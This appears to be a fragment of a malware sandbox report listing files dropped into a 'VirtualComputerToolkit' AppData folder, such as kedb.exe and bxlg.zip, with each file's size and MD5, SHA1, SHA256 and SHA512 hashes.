581B

MD5
bf32308b312b45f1921ffa857f1126b1

SHA1
f35a6a9795245293f8861197a72b27d1af12a757

SHA256
253d13b1a56e211d0fd1909c121a83dee0ec2c915754e05bda3bfcae82aab7a8

SHA512
fcc2300d36e12a949e903670a05e98cc3bd0e289cf8a9098e3225ff373c5a94514ca9d2bd80165d3a133af5caa1c6637ed50d9ac6a56be8d0ddfbaba2ca8b5d0

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\bxlg.zip

Filesize
996KB

MD5
9e73fb50d37e37ee8bd19a8e3d2b82ca

SHA1
3db1c548e86e4bb7457324a3097b05da15b7ffc3

SHA256
68ba7122ee8d9ce34ed94b6036a171ce38d6d9d9b3a609c2f4de773f4dd40d5c

SHA512
b41209300f018103b0f8a4de0537f348a3bdfcbc8feb19e7fec6634b06c266cc442145fd2d9230f827f273b0d07bb6bbcab7a0f0e9e1f558e6dd7a076f568094

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\chg

Filesize
53B

MD5
c16330b5345b80ba27af8bfd4299904e

SHA1
9f573e303431e956395dc09c510c445ae55ef7d7

SHA256
d6306f25b6b4cf4d6a82a4bbb691932ad74730ec3d9a4c2d5ec90b1574d4bafe

SHA512
173f20932faf91348ae1b26bc99dffd4b438b6868921e5b5352fb1b513382203e49643dd2129b7365d570159dadf108440141d4d77193c1c6108a2140b9ce3f6

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\cout

Filesize
17B

MD5
2fb06e7d194b236d2a1c48c9e19427b5

SHA1
c6bc50a41364af8cfc8b636eda62c39e8582a609

SHA256
d08f05765faf00c98d80ba8f9ce214d1d243bdca57e6f0257af61d876e1fc7f0

SHA512
ee05a6ba0a7f4838216f0c084c094c2f1d47fe8f40003ede4a80477631c100ca3171ee2e504fd69fc13482334d721f46614331dc20a6b66821d17de42879f522

Download Submit
C:\Users\Admin\AppData\Roaming\VirtualComputerToolkit\kedb.exe

Filesize
164KB

MD5
75375c22c72f1beb76bea39c22a1ed68

SHA1
e1652b058195db3f5f754b7ab430652ae04a50b8

SHA256
8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

SHA512
1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

Download Submit